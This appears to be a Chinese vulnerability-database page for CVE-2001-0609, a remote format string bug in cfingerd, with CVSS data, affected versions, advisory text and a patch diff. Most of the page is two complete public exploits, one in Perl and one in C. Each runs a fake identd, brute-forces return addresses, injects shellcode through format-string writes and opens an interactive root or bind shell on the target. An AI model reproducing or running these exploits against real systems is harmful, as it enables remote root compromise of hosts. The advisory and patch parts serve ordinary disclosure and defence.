CVE-2001-0609
CVSS10.0
发布时间 :2001-08-02 00:00:00
修订时间 :2008-09-10 15:08:30
NMCOES    

[原文]Format string vulnerability in Infodrom cfingerd 1.4.3 and earlier allows a remote attacker to gain additional privileges via a malformed ident reply that is passed to the syslog function.


[CNNVD]cfingerd 远程格式串漏洞(CNNVD-200108-022)

        CVE(CAN) ID: CAN-2001-0609
        
        
        
        在cfingerd的日志记录程序中存在一个格式串漏洞,允许远程用户获取root权限。
        
        
        
        cfingerd会查询和记录请求此服务的远程用户的用户名。如果攻击者设置在远程
        
        主机上设置一个虚假的indentd服务程序以返回一个格式化字符串作为用户名,
        
        他就可以利用这个格式串漏洞来进行攻击。由于cfingerd通常是以root身份运行,
        
        因此攻击者可能远程获取对被攻击主机的控制权限。
        
        
        
        有问题的代码部分在main.c 第245,258和268行:
        
        
        
         syslog(LOG_NOTICE, (char *) syslog_str);
        
        
        
         这里的syslog_str是攻击者可以控制的。利用代码中一个未中断的缓冲区,攻击
        
         者可以将定制的代码传送给syslog.
        
        
        
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:infodrom:cfingerd:1.4.1
cpe:/a:infodrom:cfingerd:1.4.2
cpe:/a:infodrom:cfingerd:1.4.0
cpe:/a:infodrom:cfingerd:1.4.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0609
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0609
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-022
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6364.php
(VENDOR_ADVISORY)  XF  cfingerd-remote-format-string(6364)
http://www.securityfocus.com/bid/2576
(VENDOR_ADVISORY)  BID  2576
http://archives.neohapsis.com/archives/bugtraq/2001-04/0202.html
(VENDOR_ADVISORY)  BUGTRAQ  20010411 CFINGERD remote vulnerability

- 漏洞信息

cfingerd 远程格式串漏洞
危急 输入验证
2001-08-02 00:00:00 2005-10-20 00:00:00
远程  
        CVE(CAN) ID: CAN-2001-0609
        
        
        
        在cfingerd的日志记录程序中存在一个格式串漏洞,允许远程用户获取root权限。
        
        
        
        cfingerd会查询和记录请求此服务的远程用户的用户名。如果攻击者设置在远程
        
        主机上设置一个虚假的indentd服务程序以返回一个格式化字符串作为用户名,
        
        他就可以利用这个格式串漏洞来进行攻击。由于cfingerd通常是以root身份运行,
        
        因此攻击者可能远程获取对被攻击主机的控制权限。
        
        
        
        有问题的代码部分在main.c 第245,258和268行:
        
        
        
         syslog(LOG_NOTICE, (char *) syslog_str);
        
        
        
         这里的syslog_str是攻击者可以控制的。利用代码中一个未中断的缓冲区,攻击
        
         者可以将定制的代码传送给syslog.
        
        
        
        

- 公告与补丁

        
        
        临时解决方法:
        
        
        
        漏洞发现者提供了一个临时的补丁:
        
        
        
        --- cfingerd-1.4.3/src/main.c.orig Fri Aug 6 23:33:38 1999
        
        +++ cfingerd-1.4.3/src/main.c Wed Apr 11 18:55:43 2001
        
        @@ -242,7 +242,7 @@
        
         if (!emulated) {
        
         snprintf(syslog_str, sizeof(syslog_str), " fingered (internal) from ", username,
        
         ident_user);
        
        - syslog(LOG_NOTICE, (char *) syslog_str);
        
        + syslog(LOG_NOTICE, "", (char *) syslog_str);
        
         }
        
        
        
         handle_internal(username);
        
        @@ -255,7 +255,7 @@
        
         snprintf(syslog_str, sizeof(syslog_str), " fingered from ",
        
         prog_config.p_strings[D_ROOT_FINGER], ident_user);
        
        
        
        - syslog(LOG_NOTICE, (char *) syslog_str);
        
        + syslog(LOG_NOTICE, "", (char *) syslog_str);
        
         }
        
        
        
         handle_standard(username);
        
        @@ -265,7 +265,7 @@
        
         snprintf(syslog_str, sizeof(syslog_str), " from ", username,
        
         prog_config.p_strings[D_FAKE_USER], ident_user);
        
        
        
        - syslog(LOG_NOTICE, (char *) syslog_str);
        
        + syslog(LOG_NOTICE, "", (char *) syslog_str);
        
         }
        
        
        
         handle_fakeuser(username);
        
        --- cfingerd-1.4.3/src/rfc1413.c.orig Sun Aug 29 14:14:25 1999
        
        +++ cfingerd-1.4.3/src/rfc1413.c Wed Apr 11 18:53:45 2001
        
        @@ -98,7 +98,7 @@
        
        
        
         if (*(++cp) == ' ') cp++;
        
         memset(uname, 0, sizeof(uname));
        
        - for (xp=uname; *cp != '\0' && *cp!='\r'&&*cp!='\n'&&strlen(uname)        
        + for (xp=uname; *cp != '\0' && *cp!='\r'&&*cp!='\n'&&(strlen(uname)+1)        
         *(xp++) = *cp;
        
        
        
         if (!strlen(uname)) {
        
        
        
        厂商补丁:
        
        
        
        暂无
        

- 漏洞信息 (20748)

cfingerd 1.4 Format String Vulnerability (1) (EDBID:20748)
linux remote
2001-04-11 Verified
0 Lez
N/A [点击下载]
source: http://www.securityfocus.com/bid/2576/info

A format string bug in the logging facility of the cfingerd "Configurable Finger Daemon" allows remote users to attain root privileges and execute arbitrary code.

cfingerd queries and logs the remote username of users of the service. If an attacker sets up a remote machine that returns specific format strings instead of a valid username, and connects to cfingerd from that machine, he can exploit the format string bugs. Because cfingerd runs as root, this means the attacker gains full control of the cfingerd host.

An exploit is available against x86 versions of cfingerd.

#!/usr/bin/perl
# Cfingerd exploit to the recent syslog format bug.
# Discovered and written by Lez <abullah@freemail.hu> in 2001.
# you have to use it as root to bind port 113.

# tested on Debian 2.1, 2.2

use IO::Socket;
#use strict;

my $network_timeout=5;
my $sleep_between_fingers=2;  # should be enough
my $debug_sleep=0;

my $fingerport=79;
my $target=$ARGV[0];
my $debug=1;
my $test_vulnerability=1;

# Debian 2.2, cfingerd 1.4.1-1
#my $control=33;  # if don't set it, exploit will find.
#my $align=0;     # the same
#$retaddr=0xbffffab0;
# my $retaddr=0xbffff880;  # the same
#$retaddr=0xbffff840;


my $retvalue=0xbffff980;  # If it finds everything correctly, and says Shell lunched, but
                          # you can't find your uid 0, decrease $retvalue by 30.
my $bytes_written=32;

#$control=17;
#$align=0;
#$retaddr=0xbffffb80;   #(or 0xbffffb68 0xbffff9d0 0xbffff9cc 0xbffff9c8)
#$retvalue=0xbffffc20;
#$bytes_written=32;



# GOOD:
my $startsig11=0xbffffbfc;
my $endsig11=  0xbffff000;

my $controlstart=45;
my $controlend=1;

my $fclient;

my $shellcode ="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xb0\x2e\xcd\x80".
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b".
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd".
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";
                                                        #59 bytes

if (!$target) {print "Usage: $0 target\n";exit}

# Starting fake identd
my $identd = IO::Socket::INET->new(
                Listen => 5,
                LocalPort => 113,
                Proto     => 'tcp',
                Reuse     => 3) or die "Cannot listen to port 113: $!\n";

if ($test_vulnerability) {&testvuln}

if (!$control) { &get_control_and_align }
else {print "Alignment: $align\nControl: $control\n" }

if (!$retaddr) {
    &find_and_exploit_sigsegv_values
}
else {
    printf "Using provided RET address: 0x%x\n",$retaddr;
    &exploit ($retaddr, $retvalue);
}


exit;




sub sendthisone { #sends a string to cfingerd, and returns 1 if the remote machine got SIGSEGV or SIGILL.
                  # a bit tricky
    my $text_to_send=$_[0];

    $text_to_send =~ s/^\ /\ \ /;

    my ($last_119, $gotback);

    $fclient = IO::Socket::INET->new("$target:$fingerport") or die "Cannot connect to $target: $!\n";
    print $fclient "e\n"; # e is the username we query.

    my $ident_client = $identd-> accept;

    my $tmp=<$ident_client>;


    my $first_64= substr($text_to_send, 0, 64);
    if (length($text_to_send) > 64) {
        $last_119= substr($text_to_send,64);
    }

    sleep $debug_sleep;

    print $ident_client "$last_119: : :$first_64\n"; # we use an other bug
                                                     # in rfc query function
                                                     # to send longer lines.
    close $ident_client;

    eval {
        local $SIG{ALRM} = sub { die "alarm\n"};
        alarm ($network_timeout);
        $gotback= <$fclient>;
        alarm 0;
    };
    if ($@) {
        die unless $@ eq "alarm\n";
        &shell;
    }

    if ($gotback =~ /SIGSEGV/i) {
        if ($debug == 2) {print "Sending $first_64$last_119: SIGSEGV\n";}
        elsif ($debug == 1) {system ("echo -n \"*\"");}
        sleep ($sleep_between_fingers);
        return 1;
    } elsif ($gotback =~ /SIGILL/i) {
        if ($debug == 2) {print "Sending $first_64$last_119: SIGILL\n";}
        elsif ($debug == 1) {system ("echo -n +");}
        print "Got signal \"Illegal instruction\".\nThe ret address is not correct\n";
        sleep ($sleep_between_fingers);
        return 1;
    } else {
        if ($debug == 2) {print "Sending $first_64$last_119\n";}
        elsif ($debug == 1) {system ("echo -n .");}
        sleep ($sleep_between_fingers);
        return 0;
    }
}


sub get_control_and_align {
    for ($control=$controlstart; $control >= $controlend; $control--) {
        for ($align=3; $align>=0; $align--) {
            my $s1= "A"x$align . "\x79\xff\xff\xbe" . "%" . $control . "\$n";
            my $s2= "A"x$align . "\x79\xff\xff\xbf" . "%" . $control . "\$n";

            if (sendthisone($s1) > sendthisone ($s2)) {
                print "\nControl: $control\nAlign: $align\n";
                return;
            }
        }
    }
    die "Could not find control and alignment values\n";
}

sub find_and_exploit_sigsegv_values {
    my ($sendbuf, @back, $addy, $retaddr, $save);

    print "Searching for eip addresses...\n";

    for ($addy=$startsig11; $addy >= $endsig11; $addy -=4) {
        $sendbuf = "a"x$align . pack "cccc",$addy,$addy>>8,$addy>>16,$addy>>24;
        $sendbuf .= "%" . $control . "\$n";

        if ($addy%0x100) {
            if (sendthisone($sendbuf)) {

                &exploit ($addy, $retvalue);    # I'm so lazy
                &exploit ($addy, $retvalue-60);
                &exploit ($addy, $retvalue+60);
                &exploit ($addy, $retvalue-120);
                &exploit ($addy, $retvalue+120);
                &exploit ($addy, $retvalue-180);
                &exploit ($addy, $retvalue+180);
                &exploit ($addy, $retvalue-240);
                &exploit ($addy, $retvalue+240);
                &exploit ($addy, $retvalue-300);
                &exploit ($addy, $retvalue+300);
                &exploit ($addy, $retvalue-360);
                &exploit ($addy, $retvalue+360);
                &exploit ($addy, $retvalue-420);
                &exploit ($addy, $retvalue+420);

            }
        }
    }
}

sub exploit {

    my $addy=$_[0];
    my $value=$_[1];

    my $sendbuf;

    printf "\nExploiting 0x%x, ret:0x%x.\n",$addy,$value;

    $sendbuf = "Z"x$align;
    $sendbuf .= &add_four_addresses($addy);
    $sendbuf .= &add_format_strings($value);

    $sendbuf .= "\x90"x (182-length($sendbuf)-length($shellcode));
    $sendbuf .= $shellcode;

    &sendthisone ($sendbuf);
}

sub add_four_addresses {
    my $addy=$_[0];
    my ($back, $i);

    for ($i=0; $i<=3; $i++) {
        $back .= pack "cccc",
                    ($addy+$i),
                    ($addy+$i)>>8,
                    ($addy+$i)>>16,
                    ($addy+$i)>>24;
    }
    return $back;
}

sub add_format_strings {
    my ($back, $i, @a, $xvalue, $nvalue, $back);
    my $ret=$_[0];

    $a[0]=$ret%0x100-$bytes_written;

    for ($i=1; $i<=3; $i++) {
        $a[$i]= ($ret >> (8*$i) )%0x100 - ($ret >> (8*($i-1)) )%0x100;
    }

    for ($i=0; $i<=3; $i++) {
        $xvalue= &positive($a[$i]);
        $nvalue= $control+$i;

        if ($xvalue <=8) {
            $back .= "A"x$xvalue          .       "%".$nvalue."\$n";
        } else {
            $back .= "%0".$xvalue."x"     .       "%".$nvalue."\$n";
        }
    }
    return $back;
}

sub positive {
    my $number=$_[0];
    while ($number < 0) {
        $number += 0x100;
    }
    return $number;
}

sub shell {
    my ($cucc, $msg);

    print "Shell launched\n";
    print $fclient "id\n";
    print &my_line(1);

    while (1) {
        $cucc=<STDIN>;
        print $fclient $cucc;

        while ($msg=&my_line(1)) {
            print $msg;
        }
    }
}

sub my_line {
    my $msg;
    eval {
        local $SIG{ALRM} = sub { die "\n"};
        alarm ($_[0]);
        if ($msg=<$fclient>) {
            alarm (0);
            return $msg;
        }
    };
}

sub testvuln {
    if ($debug) {print "Testing if fingerd is vulnerable...   "}
    if (&sendthisone ("%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n")) {
        print "Yes.\n";
        return;
    } else {
        print "No.\n";
        exit;
    }
}

		

- 漏洞信息 (20749)

cfingerd 1.4 Format String Vulnerability (2) (EDBID:20749)
linux remote
2001-04-16 Verified
0 venomous
N/A [点击下载]
source: http://www.securityfocus.com/bid/2576/info
 
A format string bug in the logging facility of the cfingerd "Configurable Finger Daemon" allows remote users to attain root privileges and execute arbitrary code.
 
cfingerd queries and logs the remote username of users of the service. If an attacker sets up a remote machine that returns specific format strings instead of a valid username, and connects to cfingerd from that machine, he can exploit the format string bugs. Because cfingerd runs as root, this means the attacker gains full control of the cfingerd host.
 
An exploit is available against x86 versions of cfingerd.
 
/* remote exploit for linux/x86 - cfingerd <= 1.4.3
 * coded by venomous of rdC - 16/apr/01
 *
 * Its just a common formatstring bug using syslog() incorrectly.
 * We need to bind as identd, so disable your identd in case you are
 * using it.
 *
 * BONUS: eip address is bruteforced, so relax and wait =)
 *
 * NOTE: for sure where we control the format string will change from
 *       platform to platform.
 *       And for sure, the shellcode address will change so maybe you
 *       want to bruteforce this too. (-1500 to +1500 should be fine i guess)
 *
 * REMEMBER: this code is for educational propourses only, do not use
 *           it on machines without authorization.
 *
 * INFO: cfingerd isnt a package of slackware 7.0
 *       cfingerd 1.4.1 is a package of debian 2.2
 *
 * Greets: ka0z, bruj0, dn0, superluck, fugitivo(!)
 *         #flatline, #rdC
 *
 * Credits: To Lez, who found this bug.
 *
 * http://www.rdcrew.com.ar - Argentinian Security Group.
 * venomous@rdcrew.com.ar
 */


#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define ROOTSHELLPORT 36864

void chld_timeo();
void chld_timeoo();

int sserver;
int cserver;
int phase=0;
int mmm=0;

unsigned long glob;
//unsigned long startaddr = 0xbffffdfc;
unsigned long startaddr = 0xbffffb34;
unsigned long stopaddr  = 0xbffff000;

char pbuf[1024];

char testcode[]=
    "\xeb\x0b\x2e\x72\x64\x43\x2e\x72\x6f\x63\x6b\x73\x2e\xeb\xfe";

char linuxcode[]=
    /* Lamagra bind shellcode modified by me, making it smaller =) - 124b */
    "\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
    "\x40\x89\xc3\x89\x46\x0c\x40\x89"
    "\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
    "\x80\x43\xc6\x46\x10\x10\x88\x46"
    "\x08\x31\xc0\x31\xd2\x89\x46\x18"
    "\xb0\x90\x66\x89\x46\x16\x8d\x4e"
    "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
    "\x66\xcd\x80\x89\x5e\x0c\x43\x43"
    "\xb0\x66\xcd\x80\x89\x56\x0c\x89"
    "\x56\x10\xb0\x66\x43\xcd\x80\x86"
    "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
    "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
    "\x80\x88\x56\x07\x89\x76\x0c\x87"
    "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
    "\xe8\x8d\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68";

struct os
{
    int id;
    char *os;
    char *shellcode;
    int fsc;
    unsigned long shaddr;
    int offset;
};

struct os types[]=
{
    {0, "slackware 7.0 - compiled cfingerd 1.4.2/1.4.3 running from inetd as root",
linuxcode, 22, 0xbffffbc4, 30},
    {1, "slackware 7.0 - compiled cfingerd 1.4.2/1.4.3 running from inetd as nobody",
linuxcode, 22, 0xbffffbc4, 30},
    {2, "debian 2.2 - default cfingerd 1.4.1 running from inetd as root", linuxcode, 33,
0xbffffb48, 0},
    {3, "debian 2.2 - default cfingerd 1.4.1 running from inetd as nobody", linuxcode, 33,
0xbffffb48, 0},
    {4, NULL, 0, 0xdeadbeef, 0}
};

main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct sockaddr_in ssin;
    int fd;
    int x;
    int xx=0;
    int sts=0;
    int pete;
    int a,b,c=22,d=0; /* c is used in case you want to seek the fsc on   */
    int guide=1;      /* your system, starting from 22, change it if you */
    int sel=0;        /* want.                                           */
    int bleh=0;       /*                                                 */
    int off=0;
    int arx=0;
    int niu=0;
    int ye=0;
    char buf[1024];
    char tex[512];

    if (argc < 4)
    {
        printf("cfingerd <= 1.4.3 remote exploit coded by venomous of rdC\n\n");
        printf("Usage: %s <platform> <host> <offset>\n",argv[0]);
        printf("where <platform> is:\n");
        for (x=0 ; types[x].os != NULL ; x++)
            printf("%d for %s\n", types[x].id, types[x].os);
        printf("\nhttp://www.rdcrew.com.ar\n\n");
        exit(1);
    }

    for (x=0 ; types[x].os != NULL ; x++)
    {
        if (types[x].id == atoi(argv[1]) )
        {
            xx++;
            sel = types[x].id;
        }
    }
    if (!xx)
    {
        printf("Unknown platform: %s\n",argv[1]);
        exit(1);
    }

    off = atoi(argv[3]);
    printf("Selected platform: %s (%d)\n",types[sel].os,sel);
    bzero(&sin,sizeof(sin));

    // fake identd
    sin.sin_family = AF_INET;
    sin.sin_port = htons(113);
    sin.sin_addr.s_addr = htonl(INADDR_ANY);

    if ( (fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        perror("socket");
        exit(1);
    }
    if ( (x = bind(fd,(struct sockaddr *)&sin, sizeof(sin)) < 0))
    {
        perror("bind");
        exit(1);
    }

    if ( (xx = listen(fd, 5)) < 0)
    {
        perror("listen");
        exit(1);
    }

    printf("fake identd bound successfuly\n\n");
    printf("pre-phase info: If you need to use the offset you can use safely steps of
120\n\n");
    printf("phase 0: finding eip...  \n");
    while (guide)
    {
        //maybe you need it..
        //        if (!d)
        //        {
        preparebuf(sel, off, ye);
        fconnect(argv[2], ye, 79);
        //        }

        pete = sizeof(ssin);
        if ( (sserver = accept(fd, (struct sockaddr *)&ssin, &pete)) < 0)
        {
            perror("accept");
            exit(1);
        }
        bzero(buf,sizeof(buf));
        read(sserver,buf,sizeof(buf));

        //horrendus debug! :)
#ifdef DEBUG
        printf("\nread(): %s\n",buf);
#endif
        sscanf(buf,"%d,%d",&a,&b);
        bzero(buf,sizeof(buf));
        bzero(tex,sizeof(tex));
        memset(tex,'\x90',119);

        bleh=strlen(pbuf);
        niu = 0;

        while (1)
        {
            if(strlen(pbuf) < 65)
            {
                if (phase==0)
                    pbuf[bleh] = '\x90';
                else
                    pbuf[bleh] = types[sel].shellcode[niu];
                bleh++;
                if (phase==1)
                    niu++;
            }
            else
                break;
        }
        arx = niu;

        if(!phase)
            for(bleh=0 ; bleh < strlen(testcode) ; bleh++)
                tex[119 - strlen(testcode) + bleh] = testcode[bleh];

        else
        {
            if ((119 - (strlen(types[sel].shellcode) - arx)) < 0)
            {
                printf("shellcode too long, exiting\n");
                exit(0);
            }

            for ( bleh=0 ; bleh < ( (strlen(types[sel].shellcode)) - arx) ; bleh++)
                tex[119 - (strlen(types[sel].shellcode)) - arx + bleh] =
types[sel].shellcode[bleh+arx];
        }

        snprintf(buf,sizeof(buf),"%s : : : %s", tex, pbuf);
        /* usefull for find the fsc on your system.
         //snprintf(buf,sizeof(buf),"%d , %d : UNIX : 1 : AAAA%%%d$p:fsc:%d\n",a,b,c,c);
        // read about 'd' below
        if (d==2) { c++; d=0; }
        */
        write(sserver,buf,sizeof(buf));

        //the same..
#ifdef DEBUG
        printf("sent: %s\n--------------------\n",buf);
#endif
        close(sserver);
        sleep(2);

        //same..
        //      if(d)
        wait(&sts);
        //      d++;

        /* if something like tcplogd is running there will be 3 connections
         * to identd, so in that case, d==3
         */
        //if(d==2)
        //    d=0;

        if ((WEXITSTATUS(sts)) == 1) // eip/shellcode address ok (at phase 0)
        {
            phase=1; ye=1; sts=0;
            printf("\nphase 1: calculating address of the first chacarcter in our buffer...
wait\n");
        }

        if ((WEXITSTATUS(sts)) == 2) // shellcode executed (at phase 1)
        {
            printf("\nphase 2 connecting to rootshell... ");
            fflush(stdout);
            close(fd); //identd fake server
            fconnect(argv[2], 2, ROOTSHELLPORT);
            printf("\n\nThanks for using rdC products!\n\n");
            exit(0);
        }
    }
}

int fconnect(char *hname, int what, int port)
{
    struct hostent *host;
    struct sockaddr_in d;
    int r;
    char hname2[128];
    char response[1024];
    d.sin_family = AF_INET;
    d.sin_port = htons(port);

    bzero(hname2,sizeof(hname2));
    strncpy(hname2,hname,sizeof(hname2));
    host = gethostbyname(hname2);
    if (!host)
    {
        printf("cannot resolve\n");
        exit(0);
    }

    bcopy(host->h_addr, (struct in_addr *)&d.sin_addr, host->h_length);

    cserver = socket(AF_INET, SOCK_STREAM, 0);

    // you can add a timeout here, but supossly you know if the server
    // is up/not firewalled, because you are using it against an authorized
    // machine and not in a script/not authorized machine, right?

    if (connect(cserver, (struct sockaddr *)&d, sizeof(struct sockaddr)) < 0)
    {
        perror("connect");
        exit(1);
    }

    if (what==2)
    {
        printf("connected!\n");
        fflush(stdout);
        rootsox(cserver);
        close(cserver);
        return;
    }

    write(cserver,"a\n",strlen("a\n"));

    if ((fork()) == 0)
    {
        printf("Waiting response...");
        for(r=0 ; r < 19 ; r++)
            printf("\b");
        fflush(stdout);
        bzero(response,sizeof(response));
        if (what==0)
            signal(SIGALRM, chld_timeo);
        else
            signal(SIGALRM, chld_timeoo);

        alarm(30);
        read(cserver,response,sizeof(response));
        if (strstr(response,"SIGILL"))
        {
            printf("Illegal Instruction\r");
            fflush(stdout);
            close(cserver);
            exit(0);
        }
        if (strstr(response,"SIGSEGV"))
        {
            printf("Segmentation Fault.\r");
            fflush(stdout);
            close(cserver);
            exit(0);
        }
        //you might add strings here..
        if (strstr(response,"Sorry, that user doesn't exist") || strstr(response,"Debian
GNU/Linux"))
        {
            printf("server not crashed.\r");
            fflush(stdout);
            close(cserver);
            exit(0);
        }
    }
    //close(cserver);
}

/* <huh> */
void chld_timeo()
{
    alarm(0);
    signal(SIGALRM, SIG_DFL);
    printf("EIP FOUND! - SHELLCODE ADDR OK!\n");
    fflush(stdout);
    close(cserver);
    exit(1);
}

void chld_timeoo()
{
    alarm(0);
    signal(SIGALRM, SIG_DFL);
    printf("shellcode executed!\n");
    fflush(stdout);
    close(cserver);
    exit(2);
}
/* </huh> */

int rootsox(int sox)
{
    fd_set  rset;
    int     n;
    char    buffer[4096];

    /* we kill the cfingerd in eternal loop and we run other nice commands ;)
     */
    char *command="/bin/killall -9 cfingerd ; /bin/uname -a ; /usr/bin/id\n";

    send(sox, command, strlen(command), 0);

    for (;;) {
        FD_ZERO (&rset);
        FD_SET (sox, &rset);
        FD_SET (STDIN_FILENO, &rset);

        n = select(sox + 1, &rset, NULL, NULL, NULL);
        if(n <= 0)
            return (-1);

        if(FD_ISSET (sox, &rset)) {
            n = recv (sox, buffer, sizeof (buffer), 0);
            if (n <= 0)
                break;

            write (STDOUT_FILENO, buffer, n);
        }

        if(FD_ISSET (STDIN_FILENO, &rset)) {
            n = read (STDIN_FILENO, buffer, sizeof (buffer));
            if (n <= 0)
                break;

            send(sox, buffer, n, 0);
        }
    }
    return 0;
}

//heavly modified formatstring engine from rdC-LPRng.c exploit - 12/00
preparebuf(int sel, int off, int what)
{
    unsigned long addr;
    unsigned long a, b, c, d;
    int pas1,pas2,pas3,pas4;
    int i;
    char temp[512];
    char buf[512];
    char atemp[128];
    char bufx[512];

    startaddr = startaddr - 0x4;
    addr = startaddr;

    bzero(temp,sizeof(temp));
    bzero(buf,sizeof(buf));
    bzero(bufx,sizeof(bufx));
    bzero(atemp,sizeof(atemp));

    if (addr == stopaddr)
    {
        printf("\nreached stopaddr, change shellcode address/fsc\n");
        exit(1);
    }

    if(what)
    {
        off-=mmm;
        mmm++;
    }

    if (mmm == 185)
    {
        printf("?!.. we cant find the first character of our shellcode!#@\n");
        exit(0);
    }

    snprintf(temp,sizeof(temp),"%p",types[sel].shaddr+types[sel].offset+off);
    sscanf(temp,"0x%2x%2x%2x%2x",&a,&b,&c,&d);
    pas1 = d - (16 * 2);
    pas1 = cn(pas1);
    pas2 = c - d;
    pas2 = cn(pas2);
    pas3 = b - c;
    pas3 = cn(pas3);
    pas4 = a - b;
    pas4 = cn(pas4);

    if(what)
        addr = glob;
    else
        glob = addr;

    printf("eip: %p - shellcode addr: %p - ",addr,types[sel].shaddr+types[sel].offset+off);
    fflush(stdout);

    for (i=0 ; i < 4 ; i++)
    {
        snprintf(atemp,sizeof(atemp),"%s",&addr);
        strncat(buf, atemp, 4);
        addr++;
    }


snprintf(bufx,sizeof(bufx),"%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",pas1,(types[sel].fsc),pas2,(types[sel].fsc)+1,pas3,(types[sel].fsc)+2,pas4,types[sel].fsc+3);
    strcat(buf,bufx);
    bzero(pbuf,sizeof(pbuf));
    strncpy(pbuf,buf,sizeof(pbuf));
}

cn(unsigned long addr)
{
    char he[128];

    snprintf(he,sizeof(he),"%d",addr);
    if (atoi(he) < 8)
        addr = addr + 256;

    return addr;
}

		

- 漏洞信息

541
cfingerd Malformed IDENT Reply Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public

- 漏洞描述

- 时间线

2001-04-11 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

cfingerd Format String Vulnerability
Input Validation Error 2576
Yes No
2001-04-11 12:00:00 2009-07-11 06:06:00
This vulnerability was made public in an advisory posted to BugTraq by Megyer Laszlo <mailto:abulla@freemail.hu> on 11 April, 2001.

- 受影响的程序版本

Infodrom cfingerd 1.4 .3
Infodrom cfingerd 1.4 .2
Infodrom cfingerd 1.4 .1
+ Debian Linux 2.2 r2
+ Debian Linux 2.2 r1
+ Debian Linux 2.2
+ Progeny Debian 1.0
Infodrom cfingerd 1.4 .0

- 漏洞讨论

A format string bug in the logging facility of the cfingerd "Configurable Finger Daemon" allows remote users to attain root privileges and execute arbitrary code.

cfingerd queries and logs the remote username of users of the service. If an attacker sets up a remote machine that returns specific format strings instead of a valid username, and connects to cfingerd from that machine, he can exploit the format string bugs. Because cfingerd runs as root, this means the attacker gains full control of the cfingerd host.

An exploit is available against x86 versions of cfingerd.

- 漏洞利用

An exploit written in perl is available against x86 versions of cfingerd. Because the exploit listens on the identd port, it must be run as root.

- 解决方案

Patches are available against cfingerd 1.4.3 that address the syslog format-string bugs and a single NULL-byte buffer overflow issue:


Infodrom cfingerd 1.4 .1

Infodrom cfingerd 1.4 .3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站